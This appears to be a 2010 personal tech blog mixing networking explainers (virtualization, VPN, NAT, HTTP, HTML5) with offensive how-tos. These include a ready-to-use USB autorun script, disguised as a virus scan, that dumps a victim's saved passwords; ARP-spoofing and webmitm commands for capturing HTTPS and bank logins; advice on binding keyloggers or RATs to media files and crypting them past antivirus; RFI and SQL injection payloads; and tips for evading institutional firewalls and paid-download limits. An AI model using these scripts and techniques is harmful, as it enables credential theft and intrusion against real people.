Arpit Tripathi's Blog

Virtualization, Grid & Cloud Computing - Basics

2010-12-13T22:39:00.000-08:00

Virtualization

You maybe know a little about virtualization if you have ever use a software to allow a piece of hardware to run multiple operating system images at the same time. A large cluster of servers does not essentially constitute a grid. In order to manage those resources, virtualization is required so that resources are aggregated, and expanded or pulled back as the computational, storage, or bandwidth requirements of applications change. Virtualization can be performed at three levels:
Network virtualization is a technique of combining the existing resources in a network by splitting up the available bandwidth into channels, each of which is independent from the others, and each of which can be assigned (or reassigned) to a particular server or device in real time. The idea is that virtualization hides the factual complexity of the network by separating it into manageable parts, much like your partitioned hard drive makes it easier to manage your files.
Server virtualization uses software that allows a server to be logically partitioned so that applications have a dedicated space in which to execute. The partitions and underlying resources are constantly balanced, based on the requirements of applications running on it. The purpose is to spare the user from having to understand and manage complicated details of server resources while increasing resource sharing and utilization and maintaining the capacity to expand later.
Storage virtualization is the pooling of physical storage from multiple network storage devices into what appears to be a single storage device that is managed from a central console.

Grid Computing

When hundreds or thousands of servers are clustered and managed as a single massive computing resource, the processing power available for use is enormous. Grid computing is the act of sharing tasks over multiple computers. Tasks can range from data storage to complex calculations and can be spread over large geographical distances. Grids are often constructed with the aid of general-purpose grid software libraries known as middleware. Grids allow customers to pay only for the processing capability, storage, and network bandwidth they use.
Grid computing can be thought of as distributed and large-scale cluster computing and as a form of network-distributed parallel processing. Grid computing is similar to cluster computing, but there are a number of distinct differences. In a grid, there is no centralized management; computers in the grid are independently controlled, and can perform tasks unrelated to the grid at the operator's discretion. The computers in a grid are not required to have the same operating system or hardware. Grids are also usually loosely connected, often in a decentralized network, rather than contained in a single location, as computers in a cluster often are.

Cloud computing

If you have an e-mail account with a Web-based e-mail service like Hotmail, Yahoo! Mail or Gmail, then you've had some experience with cloud computing. Instead of running an e-mail program on your computer, you log in to a Web e-mail account. The software and storage for your account doesn't exist on your computer, it's on the service's computer cloud. Cloud computing is closely related to grid computing. Cloud computing requires that a grid already be established because the foundation of a cloud computing environment is a grid. Clouds have the same operational necessities and customer expectations as grids, with regard to security, data protection, isolation, performance, and availability. In a grid computing system, networked computers are able to access and use the resources of every other computer on the network. In cloud computing systems, that usually only applies to the back end. Rather than having a focus on platform middleware, server hardware, network and storage resources, cloud computing is the offering of services without exposing the grid and how it is managed.

User-Agent Spoofing

2010-07-13T00:37:00.000-07:00

Sometimes, you might encounter problem of accessing a website, just because the web server doesn’t recognize or allow that web browser (client program) you used to access the site. Some of you might recall Google Chrome version earlier than 0.4.154.33 encountered problem with Windows Live Mail (a.k.a. hotmail), as the Microsoft free webmail system didn’t properly recognize this. User-Agent spoofer/switcher extension/addons allows users to access sites which lock contents to certain browsers .

Fix It For Firefox:

The User Agent Switcher addon adds a menu and a toolbar button to switch the user agent of the browser. The typical usage is to allow access to sites that restrict access based on the browser being used. To switch the user agent of the browser select a user agent in the ‘User Agent Switcher’ menu under the ‘Tools’ menu of the browser. To customize the list of user agents select ‘Edit User Agents…’ under the ‘User Agent Switcher’ menu.

Download User Agent Switcher Extension from here https://addons.mozilla.org/en-US/firefox/addon/59/

Alternate Method:
1. Open Firefox web browser, type about:config in the address bar and press ENTER.
2. You might see some text titled “Here be dragons!”, just click the only button to proceed. Now, you should see a page of Firefox settings (known as Preference). Right click on the page, select New follow by String.
3. In the New String Value dialog box, enter the preference name general.useragent.override and click OK.
4. The next dialog box appears, this time prompt for a value for the Preference name defined in previous step – enter the user agent string of your choice here:

Now, you should close all the Firefox windows. Upon reopen, the new user agent string specified in general.useragent.override should be effective. To verify it, type about: in the address bar and press enter.

Fix It For Chrome:

Chromeleon is a user agent switcher extension for Google chrome. This extension allows users to change the user agent string passed by Chrome to mock any browser they wish. This user-agent spoofer extension allows Chrome users to access sites which lock contents to certain browsers or intentionally block chrome. Also you can set a specific filtering list, so that Chromeleon will automatically switch user-agent strings based on the domain or URL specified.

Features of Chromeleon User agent Switcher extension: One click Useragent changer, Can add specific URL filter list, Add custom user agent strings

Only problem with this extension is that it does not modify HTTP headers, so sites which sniff useragents at network level could see through the spoofing.

Download Chromeleon Extension from here https://chrome.google.com/extensions/detail/aafciojnlamllgpkpdkbamkfgbofhgcj

Alternate Method:
1. Chrome browser spoofing could also be done from command line without installing the extension.
2. Create a new shortcut for chrome and add –user-agent=”custom string” to the target of this shortcut [e.g. C:\Users\XXXX\AppData\Local\Google\Chrome\Application\chrome.exe --user-agent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)" ].
3. Now run chrome using this shortcut.

Virtual Private Networks

2010-07-11T13:42:00.001-07:00

VPN (Virtual Private Networks) gives enormously secure connections between private networks linked through the Internet. It allows remote computers to act as though they were on the same secure, local network. VPNs enable file sharing, video conferencing and similar network services. Virtual private networks generally don’t provide any new functionality that isn’t already offered through alternative mechanisms, but a VPN implements those services more efficiently / cheaply in most cases. The VPN can be found in workplaces and homes, where they allow employees to safely log into company networks. Telecommuters and those who travel often find a VPN a more suitable way to stay connected to the corporate intranet. No matter your current involvement with VPNs, this is a good technology to know something about. So here it goes…

Imagine thousands of islands in a huge ocean, some are very close to each other and some are very far. The regular way to travel from one island to another is to take a boat from one island to another. Of course, traveling on a boat means that you have almost no privacy. Anything you do can be seen by someone else. We can assume each island as a private LAN and the ocean is the Internet. Traveling by boat is like connecting to a other LAN through the Internet. We have no control over the wires and routers that make up the Internet.

Now suppose an island has a bridge to another island so that there is easier, more secure and direct way for people to travel between the two. It is expensive to build and maintain the bridge, even though the island you are connecting with is very close. But the need for a reliable, secure path is so great that you have to do it anyway. This is very much like having a leased line. The bridges (leased lines) are separate from the ocean (Internet), yet are able to connect the islands (LANs). Many companies have chosen this route because of the need for security and reliability in connecting their remote offices. However, if the offices are very far apart, the cost can be prohibitively high -just like trying to build a bridge that spans a great distance.

Now suppose each resident of an island has a small submarine with some amazing properties. It’s fast, It’s easy to take with you wherever you go, It’s able to completely hide you from any other boats or submarines. Although residents are traveling in the ocean along with other traffic, they could travel back and forth whenever they wanted to with privacy and security. That’s essentially how a VPN works. Each remote member of network can communicate in a secure and reliable manner using the Internet as the medium to connect to the private LAN. A VPN can grow to accommodate more users and different locations much easier than a leased line. In fact, scalability is a major advantage that VPNs have over typical leased lines. Unlike with leased lines, where the cost increases in proportion to the distances involved, the geographic locations of each office matter little in the creation of a VPN.

Advantages Of VPN
1. Allows you to be at home and access your company’s computers in the same way as if you were sitting at work.
2. Almost impossible for someone to tap or interfer with data in the VPN tunnel.
3. If you have VPN client software on a laptop, you can connect to your company from anywhere in the world.

Google Talk in Firefox Sidebar

2010-07-09T21:12:00.000-07:00

We all are regular user of google chat service. To use this service either we use the stand-alone G- Talk desktop client or the floating AJAX version in Gmail. But i feel that Google Talk Gadget is more usable than both of them. Here, each chat session opens up as a tab (like tabs are open in Firefox browser). It can show previews of images or video and the chat client can easily be embedded inside WebPages.

Problem With It: The webpage (like the Google personalized page) where we have embedded the G-Talk gadget must be in front of us all the time.
Solution: Put the Google Talk client in the Firefox sidebar so it always stays in the foreground no matter what website you are on currently.

To add Google Talk to your Firefox sidebar follow these steps.

1. Bookmark the following URL http://talkgadget.google.com/talkgadget/client
2. Now goto Bookmarks menu, navigate to the above bookmark, right click on it and choose Properties. click the checkbox that says “Load this bookmark in the sidebar“.
3. Now go to View->Sidebar->Bookmarks and click on this bookmark. You are done now.

Most of the corporate offices, colleges block gtalk along with other messengers. With this trick, you’ll be able to access google talk, MSN, Yahoo and ICQ messengers in the offices, schools or any other places where these messengers are blocked for use.

Network Address Translation (NAT)

2010-07-07T01:01:00.000-07:00

For a computer to communicate with other computers, it must have an IP address. With the explosion of the Internet and the increase in home networks and business networks, the number of available IP addresses is simply not enough. The obvious solution is to redesign the address format to allow for more addresses IPv6 but will take several years to implement because it requires modification of the entire infrastructure of the Internet. Network Address Translation (NAT) allows a single device, such as a router, to act as agent between the Internet (public network) and a local (private) network. This means that only a single unique IP address is required to represent an entire group of computers to outside their network.

Reasons to use NAT:
1. Shortage of IP addresses
2. Security and Administration

How NAT Works

Suppose an inside host (192.168.65.29) wants to communicate with an google server (209.85.231.104). It sends a packet to the NAT-configured router. The router reads the source IP address of the packet and checks if the packet matches the criteria specified for translation. The router has an ACL (Access Control List) that identifies the inside network as valid hosts for translation. Therefore, it translates an inside local IP address ( 192.168.65.29) into inside global IP address( 117.240.114.18). It stores this translated local to global address in the NAT table. The router then sends the packet to its destination.

When the google server responds back, the packet comes back to the router (117.240.114.18). The router looks its NAT table and finds it as previously translated IP address. Then, it translates the inside global address (117.240.114.18) to the inside local address (192.168.65.29), and the packet is forwarded to host at IP address 192.168.65.29. If it does not find a translation that match, the packet is dropped.

NOTE:
NAT is sometimes confused with proxy servers but they are different. In NAT neither one realizes that it is dealing with a third device, but in proxy server source computer knows that it is making a request to the proxy server and must be configured to do so. The destination computer thinks that the proxy server is the source computer and deals with it directly. Also, proxy servers usually work at Layer 4 (Transport) of the OSI Reference Model or higher, while NAT is a Layer 3 (Network) protocol. Working at a higher layer makes proxy servers slower than NAT devices in most cases.

Types Of NATing
Static NAT: Mapping an local IP address to a external IP address on a one-to-one basis.
Dynamic NAT: Maps an local IP address to a external IP address from a group of external IP addresses.

NAT Overloading: Maps multiple local IP addresses to a single external IP address by using different ports. Also known also as PAT (Port Address Translation).
In overloading, each computer on the local network (like 192.168.65.29, 192.168.65,101 etc.) is translated to the same IP address (117.240.114.18) but with a different port number.

NAT Overlapping: Maps an external IP address to another external IP address.

Run Torrent Behind Proxy And Firewall

2010-06-26T23:45:00.000-07:00

Dedicated to my juniors who ask me many times that “How to run Torrent behind proxy n firewall??” or “Sir please unblock Torrent over institue lan.”

Torrents is preferred means of downloads. Use of BitTorrent is not possible on some networks (e.g. institute or office lan). In this post am going to tell you a easy solution to overcome this problem. By using a secure connection (SSH), you can bypass almost every firewall. Linux or a UNIX-based OS terminal supports SSH. For Windows, you have to download SSH clients. There are may SSH clients, but PUTTY is (probably) the best and certainly the most popular. For this hack you need a SSH account. You can try one of these free shell providers from this list . So here it goes….

Steps:

1. Run putty and In the address box, put the hostname or IP address of the server you have an SSH account on. Make sure the SSH radio button or check-box is ticked, and be sure you’re using port 22.
2. In the menu, click on Proxy tab under Connections and put your proxy settings there.
3. In the menu, click on SSH and select enable compression. this will compress the traffic thru your SSH tunnel, which not only provides a modest improvement in transfer rates, but has some minor security benefits as well. Set your preferred protocol to “2″, or “2 only”.
4. Click on the tunnels menu under SSH. At the bottom, select the dynamic button, and enter a source port. Use any port (greater than 1024 like 4567). Click the “add” button.
5. Go back to the session tab in the menu, enter in a title for this proxy, and click save.
6. Now Configure your BitTorrent client. In uTorrent go to Options > Preferences > Connection. Enter your port number (which u use earlier like 4567), socks 4 or 5 as type, and localhost in the proxy field. Socks5 is preferable to version four, and supported by our SSH tunnel, so select it. Click OK, and you should now be proxying thru the server with the SSH account.

You’re done, restart your BitTorrent client and you’re ready to go. BitTorrent over SSH tends to be a bit slower than your normal connection, but it’s a great solution when BitTorrent connections are blocked.

Customize start menu button: Windows 7

2010-06-25T04:09:00.000-07:00

Have you ever wondered how to customize the start menu button in Windows 7? Well it is possible to spice up your copy of Windows 7 by giving a new look to the start menu button. In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a binary editor. Resource HackerTM is a freeware utility and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP, Vista and Windows7 operating systems.

Requirements

1. Resource Hacker: A Binary File Editor
2. Custom Start Menu Images: You nees three images that must be of the size 54×162 with a .bmp extension.

1st Image – For idle state
2nd Image – For mouse over
3rd Image – When button is clicked

Process:

1. Run Resource Hacker Editor.
2. Go to File menu and Open file “explorer.exe” into the Resource Hacker.
3. Go to Bitmap branch, expand 6801 option, right-click on 1033 and select Replace Resource option.
4. A new window appears. Click on Open file with new bitmap button.
5. Navigate to the customized (.bmp) image, open it and click on Replace button.
6. Repeat steps 3 to 5 above for the options 6805 and 6809 as well.
7. Now save the file. Resource Hacker will automatically create a backup file called explorer_original.exe so that you can restore it in the future if needed. Restart your computer and have fun.

Download Resource Hacker Tool from http://www.angusj.com/resourcehacker/

Usb Password Stealer

2010-06-22T21:17:00.000-07:00

Many people save their passwords in their Browser and windows. As we know that there are lots of tools available on internet to recover Saved passwords, Thus one can easily run those software at victim’s computer and get their’s passwords. With the help of USB Passwords Stealer one can easily steal that saved passwords from victim’s computer.

Requirements:

Password recovery software:

1. Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc
2. IE Passview – IE passview is a small program that helps us view stored passwords in Internet explorer.
3. Protected storage pass viewer(PSPV) – Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.
4. Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.

Steps:

1. Download all these tools and copy their exe files (mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe) into your USB Drive.

2. Open notepad and write the following command into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this file as autorun.inf and copy it into your USB drive.

3. Open another notepad and write the following command into it.
@echo off
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save this file as launch.bat and copy it into your USB drive.

4. Its done now insert it in victims computer and this will save password in .txt files for you.

Premium Link Generator

2010-06-21T19:56:00.000-07:00

I think all of us are regular user of Rapidshare and Megauplaod ,famous file sharing websites. Everytime when we want to download we have to wait for certain amount of time untill the download link appears. In case of Rapidshare, if your ip is already downloading some files from their server then you have to wait for the time period untill that download finished. Thus you might want to get yourself a premium account to avoid waiting every time you download files from it. Unfortunately, we don’t have money or don’t have will to buy premium account. Specially kids and teenagers who don’t own credit cards are not able to purchase a premium account.

Thus here are some link that genrate premium account for you so that you can download files easily.

http://rapid8.com/
http://www.rapidtime.net/
http://rapidshare-premium-link-generator.com/
http://premiumrapidshare.net/rapidshare.php
http://www.youleech.net/
http://www.hellorapid.com/public/index.php

To see how Rapidshare, Megaupload Premium Link Generator works visit link

If you have a Rapidshare premium account, you can also set up a generator for others using the source code provided on internet. I’m not sure if it’s legal though, so use at your own risk.

HTTP Headers

2010-06-19T20:06:00.001-07:00

In HTTP protocol, client(also referred as a user agent) submits HTTP requests to the server by sending messages to it. The server sends messages back to the client in HTTP response. Both HTTP requests and HTTP responses use headers to send information about the HTTP message. A header is a series of lines, with each line containing a name followed by a colon and a space, and then a value. The fields can be arranged in any order. Some header fields are used in both request and response headers, while others are appropriate only for either a request or a response.

Many request header fields will allow the client to specify several acceptable options in the value part and, in some cases, even rank each option’s preference. Multiple items are separated using a comma. For example, a client could send a request header that includes “Content-Encoding: gzip, compress,” indicating it would accept either type of compression. If the server uses gzip encoding for the response body, its response header would include “Content-Encoding: gzip“. One can add his own field in HTTP headers so that it contains some value specified by user. Some fields can occur more than once in a single header. For example, a header can have multiple “Warning” fields.

In most the the hacking contest you will find atleast one question on HTTP headers. Information can be hidden in them. To clear that level you have to see and edit the HTTP headers fields. There are lots of softwares/addons available on the net that make it possible to see and edit HTTP header.

Some firefox addon: Firebug, Add and Modify Headers, Live HTTP headers

For more information regarding HTTP headers fields and their values please visit http://en.wikipedia.org/wiki/HTTP

BackTrack : one-stop-shop for hackers

2010-06-18T20:25:00.000-07:00

Whether you are hacking wireless, exploiting servers, learning, performing a web application assessment, or social-engineering a client, BackTrack is the one-stop-shop for all of your security needs. BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

The evolution of BackTrack spans many years of development, penetration tests, and unprecedented help from the security community. BackTrack originally started with earlier versions of live Linux distributions called Whoppix, IWHAX, and Auditor. When BackTrack was developed, it was designed to be an all in one live cd used on security audits and was specifically crafted to not leave any remnants of itself on the laptop. It has since expanded to being the most widely adopted penetration testing framework in existence and is used by the security community all over the world.

Offensive Security has announced the release of BackTrack 4, an Ubuntu-based live DVD containing a large collection of tools for security audits, computer forensics and penetration testing: “BackTrack 4 final is out and along with this release come some exciting news, updates, and developments. BackTrack 4 has been a long and steady road, with the release of a beta last year, we decided to hold off on releasing BackTrack 4 final until it was perfected in every way, shape and form. This release includes a new kernel, a larger and expanded toolset repository, custom tools that you can only find on BackTrack, and more importantly, fixes to all major bugs that we knew of. This release has received an overwhelming support from the community and we are grateful to everyone who has contributed to the success of this release.”

Name of some tools that are included in BackTrack
1. Metasploit integration
2. RFMON Injection capable wireless drivers
3. Kismet
4. AutoScan-Network
5. Nmap
6. Ettercap
7. Wireshark (formerly known as Ethereal)
8. BeEF (Browser Exploitation Framework)

Download BackTrack
For more information about BackTrack visit their website.

Tele Spoofing

2010-06-17T18:05:00.001-07:00

Caller ID spoofing: It is the practice of causing the telephone network to display a number on the recipient’s caller ID display which is not that of the actual originating station; the term is commonly used to describe situations in which the motivation is considered vicious by the speaker. Caller ID is spoofed through a variety of methods and different technology. The most popular ways of spoofing Caller ID are through the use of Voice over IP or PRI lines. Just as e-mail spoofing can make it appear that a message came from any e-mail address the sender chooses, caller ID spoofing can make a call appear to have come from any phone number the caller wishes.

SMS spoofing: SMS spoofing technology which uses the short message service (SMS), available on most mobile phones and personal digital assistants, to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text. SMS Spoofing occurs when a sender manipulates address information. Often it is done in order to impersonate a user that has roamed onto a foreign network and is submitting messages to the home network.

To use a typical service, the customer dials from any phone the toll free number given to them by some service provider and enters their PIN. They are then asked to enter the number they wish to call and the number they wish to appear on the caller ID. Once the “customer” selects the options, the call is then bridged and the person on the other end assumes someone else is calling them.

It is now possible to spoof (or change) the Caller id in India. CrazyCall is the ultimate tool for making prank calls and fooling your friends. You can change your CallerID, so when you call someone he sees on his Caller ID display the number you selected. You can also change the pitch of your voice for deep and creepy or high and funny.

How is it done: ( I didn’t try this till now so try it your own risk )

1. Select the country you are calling from, choose the CallerID you want to display and enter the number you want to call. Press “Get me a code” and we will provide you with number to call and a code.
2. Call the number
3. Enter the code and we will connect your call to your friend with the CallerID and voice you have selected.

Remote File Inclusion

2010-06-15T01:09:00.001-07:00

Malicious file execution vulnerabilities are found in many applications. When the data is insufficiently checked, this can lead to arbitrary remote and hostile content being included, processed or invoked by the web server. All web application frameworks are vulnerable to malicious file execution if they accept filenames or files from the user. PHP is particularly vulnerable to remote file include (RFI) attack through parameter tampering with any file or streams based API. Remote file inclusion, commonly known as RFI is a form of attack where the attacker tries to inject their own php code inside your’s php application. If an attacker got success in that he will be able to execute any code on your webserver.

Suppose we have a website that take varialbe like page=abc.htm to work out which page should be displayed.

Code:
$filename =$_GET['page'];
include($filename);

above code shows that whatever is passed to the page will get included. What will happen if the attacker passes the url like this “http://www.hissite.com/index.php?page=http://www.evilsite.com/evil.txt?”. The actual code that the web server is executing looks like this if attacker passes that url.

Code:
$filename =$_GET['page'];
//$filename has value “http://www.evilsite.com/evil.txt?”;
include($filename);

Thus attacker is able to get his code executed on webserver. The attacker includes a .txt file and not a .php file because if the script was a .php then script will get executed on the attackers server and not on target. Attacker also add the “?” at the end so anything that might be inside the include() function on the target server, is removed.

Example Code:
$filename =$_GET['page'];
include($filename .”.php”);

The above code add .php to in filename passed to it. So if we passed it “http://www.evilsite.com/evil.txt” then include() function actaully have “http://www.evilsite.com/evil.txt.php”.

In general, a well-written application will not use user-supplied input in any filename for any server-based resource, However, many legacy applications will continue to have a need to accept user supplied input. This kind of attack can be stoped by a performing simple checks on the data.

Man in Middle Attack

2010-06-13T20:26:00.000-07:00

Secure Sockets Layer (SSL) provides a secure communication channel between two peers. I am not going to discuss here that “How SSL works”. For that visit the link .This attack talks about HTTPS only. In case of HTTPS the user has usually possibility to decide whether to accept the certificate represented to her/him or not. Together with the lack of client peer authentication this opens possibility to man-in-the-middle attack which is a widely known feature of SSL. The attacker can fake the server to the client and create two secure channels, one to the client and one to the server.

Prerequisites

Any Spoofing Software: In man-in-the-middle attacks the attacker have to redirect the client’s communication to himself. Thus you need a software that has the feature of spoofing to implement the redirection.
Webmitm: As the communication is encrypted an active relay tool is required as simple TCP forwarding is not enough.
Ssldump: To decrypt data-packet that comes to your computer.

Note: Use Backtrack Operating System that has all tools installed already. This OS is designed specially for security and hacking purpose. The command that are used in this tutorial is also based on this OS but one can use this connect for any OS.

Attack Preparation:

Step 1. Turn on the ip forwarding so that packet will not drop on your computer.
echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2. There should be some rule that will be follwed by firewall, if they are not add these entries in your firewall.
iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT

Step 3. Spoof the victim’s computer so that data-packet routes through your computer instead of victim’s default gateway.
arpspoof -t “Victim’s ip” “Your ip”

Step 4. Turn on the webmitm
webmitm -d

Step5. Run ssldump so that it decrypt the log file for ssl entries.
ssldump -n -d -k webmitm.crt | tee ssldump.log

Now all you do is wait for the victim to log into google/gmail/yahoo/msn/hotmail or any other https connection, even a bank and you will see the passwords pop up in the terminal.

Data Transmission over Internet

2010-06-13T04:10:00.000-07:00

There are lots of queries from my juniors regarding “How data packets are transmitted over intenet”. I tried my best to solve their queries. I hope there are more juniors who want to ask the same question but not able to contact me. So here it goes…

When you type any URL(Universal Resource Locator ) in addressbar of your browser like (www.techpandit.in into your browser’s URL area) and hit Return, the browser tells the Transport Layer that it wants to establish a connection and passes the URL down. The first thing happen is- Browser runs the DNS client that made the first packet (User Datagram Protocol packet) to go down the stack with a destination port of 53(DNS port) to the ip-address of your Domain Name Server (Packet gets the ip-address of DNS server by your’s ip settings) to request the IP address of www.techpandit.in

As soon as the IP address for the website is returned, the transport layer initiates a Transfer Control Protocol (TCP) connection to the server on which website is hosted by sending a Synchronization (SYN) packet. The SYN packet proposed following values for the connection: Maximum Transmittable Unit, Maximum Segment Size and Receive Window. The server on which website is hosted will either accept or reject this SYN packet by transmitting a Synchronization Acknowledgement (SYN-ACK). If accepted, your PC will send one more SYN packet and the web page will start loading. If rejected, the SYN-ACK your computer receives will have the edited values for these fields listed. If your computer accepts the changes it will send another SYN packet and the transfer will start. If your computer cannot accept the new values another SYN packet will be transmitted by your computer to the web server with more changes – and the process continues until both sides agree, or the connection times out or is cancelled.

In this way you have a connection to the website and data is transmitting. Packets are being sent from the web server to your computer and the page is loading on your web browser. This process is looks simple but let’s see about what’s really happen behind it.

Whenever a data packet leaves computer it must have 6 fields: Source and Destination ip-address, Source and Destination mac-address and Source and Destination port no. As the data-packet moves down from the Application Layer each layer “wraps” the data in it. The Transport Layer adds a TCP or UDP header with a source and destination port number. The Internet Layer adds source and destination ip-address . The Network Layer adds source and destination mac-address (Medium Access Control). If you don’t have the mac-address of destination the destination mac-address fields contains the mac-address of yours default gateway. The packet is then transmitted over the network to another node on the same network in which you computer lies. It’s sent to the default gateway that you have configured in ip-settings if destination is not in the same network. You see, MAC addresses are used to communicate with devices that are on the same network. IP addresses are used to communicate with devices on different networks. So, the source and destination MAC address is constantly changing as a packet is routed across a network (or the Internet). The source and destination IP address remains the same.

On the receiving computer, each layer “unwraps” the package. The Network layer “unwraps” the Network Layer “packaging” by removing the source and destination MAC and then passes the packet to Internet Layer. The Internet Layer “unwraps” the Internet Layer packaging by removing the IP header (source and destination IP) and then passes the packet to the Transport Layer. The Transport layer removes the Transport Layer header and passes the data to the correct application determined by the destination port number.

Hacking Tools : Top 5

2010-06-10T13:59:00.000-07:00

1. Metasploit
The Metasploit Framework is both a penetration testing system and a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler. The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload. Hundreds of exploits and dozens of payload options are available.
For more information about it and download please visit http://www.metasploit.com/framework/

2. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Definataly we will have a blog about Wireshark later.
For more information about it and download please visit http://www.wireshark.org/

3. Cain and Abel
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. Definataly we will have a blog about Cain and Abel later.
For more information about it and download please visit http://www.oxid.it/cain.html

4. Nmap
I think everyone has heard of this one. Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
For more information about it and download please visit http://www.insecure.org/nmap/download.html

5. John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
For more information about it and download please visit http://www.openwall.com/john/

HTML5 : An Introduction

2010-06-09T01:15:00.000-07:00

Firefox, Safari, and Chrome support a few features outlined in it. Opera Mobile, Android browser and Safari for iPhone also support elements of it, Google’s Wave projects are depending on it, Chrome OS for netbooks relies on it for offline storage and most web developers are overjoyed about what it means. If you doesn’t know what i am talking about, So here it goes…

What is HTML5?
HTML5 is the next generation of HTML, superseding HTML 4.01, XHTML 1.0, and XHTML 1.1. HTML5, defines the 5th major revision of the core language of the World Wide Web: the Hypertext Markup Language. It provides new features that are necessary for modern web applications. It is a specification for how HTML, should be formatted and utilized to deliver text, images, multimedia, web apps, search forms, and anything else you see in your browser. HTML5 isn’t a software release, or a web development law. It’s a voted-upon and group-edited standard, written in broad fashion to accommodate different styles of development and the different thinking among web browser makers.

Flash, Silverlight, and other browser plug-ins are artificial solutions for a natural problem that HTML5 is trying to fix: Placing and managing interactive elements on a web page.

Features of HTML5

Smarter forms
Canvas drawing
Offline storage
Geolocation
Native video and audio streaming support

See HTML5 in action
http://apirocks.com/html5/html5.html#slide1
http://html5demos.com/
http://html5gallery.com/

Further for information regarding HTML5 please visit http://www.w3.org/TR/html5/

Firefox Without Firebug : Never

2010-06-07T00:18:00.000-07:00

Firebug is a free, open source tool that is available as a Mozilla Firefox extension. Some uses it regulary while others even don't know about it. So here it goes...

Firebug is an extension for Firefox that allows debugging, editing, and monitoring of any website's CSS, HTML, DOM, and JavaScript. It also allows performance analysis of a website. Furthermore, it has a JavaScript console for logging errors and watching values. Firebug simply makes it easier to develop websites/applications. It is one of the best web development extensions for Firefox. Firebug provides all the tools that a web developer needs to analyze, debug, and monitor JavaScript, CSS, HTML, and AJAX. It also includes a debugger, error console, command line, and a variety of useful inspectors.

Firebug capabilities
1. Inspect and edit HTML
2. Inspect and edit CSS and visualize CSS metrics
3. Use a performance tuning application
4. Profile and debug JavaScript
5. Explore the DOM
6. Analyze AJAX calls

For more information and updates on Firebug please visit http://getfirebug.com/whatisfirebug

Firebug is an extension for Firefox, but that doesn't mean it works only on Firefox. What happens when we want to test our pages against Internet Explorer, Opera, or Safari? Firebug Lite is the solution for this. It's a product that can be easily included in our file via a JavaScript call, just like any other JavaScript, to support all non-Firefox browsers. It will simulate some of the features of Firebug in our non-Firefox browsers. Chrome already has firebug Lite as a extension.

For more information and updates on Firebug Lite, please visit http://getfirebug.com/firebuglite

Binders

2010-06-05T03:23:00.000-07:00

Binder is a software used to combine or bind two or more files in one file under one name and extension like viruses, trojans etc. with images, mp3, exe, batch files. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application ( Keylogger or RAT) the application is also run when the actual binded file is run.

So, you can bind keylogger or RAT with image, movie or song (any file depending on victim) and then ask victim to run this binded file on his computer. When the victim runs your binded file(supposed binded with keylogger) on his computer, keylogger is installed on his computer and you can easily obtain all his typed keylogs.

Binders though are useful in hiding keylogger or trojans are often detected by antiviruses as hacktools and hence deleted as viruses. Thus it is better to use Crypters to avoid Anti-virus detection. It is general practice to first crypt the keylogger or trojan with Crypter and then bind the crypted trojan to make it deceptive. There are many Binders and Crypters available on the net and forums.

SQL Injection Exposed

2010-06-03T21:09:00.000-07:00

Structured Query Language (SQL) is the nearly universal language of databases that allows the storage, manipulation, and retrieval of data. An SQL query comprises one or more SQL commands, such as SELECT, UPDATE or INSERT. SQL injection is currently the most common form of web site attack. In that web forms are very common, they are often not coded properly and the hacking tools that can be used to find weaknesses and take advantage of them are commonly available online.

Example of SQL Injection:

SELECT queries, has a clause by which it returns data. Suppose for any website my username is "arpit" and password is also "arpit". I entered a username "arpit" and password "arpit" in the form, then I would be logged in. The query that runs behind would look something like this:

SELECT userId FROM Users WHERE userName='arpit' AND userPass='arpit';

but what about if I entered a username "arpit" and a password " ' or 1=1 --" .

[All inputs are without double quotes]

The resultant query would now look like this:

SELECT userId FROM Users WHERE userName='arpit' AND userPass=' 'or 1=1 --'

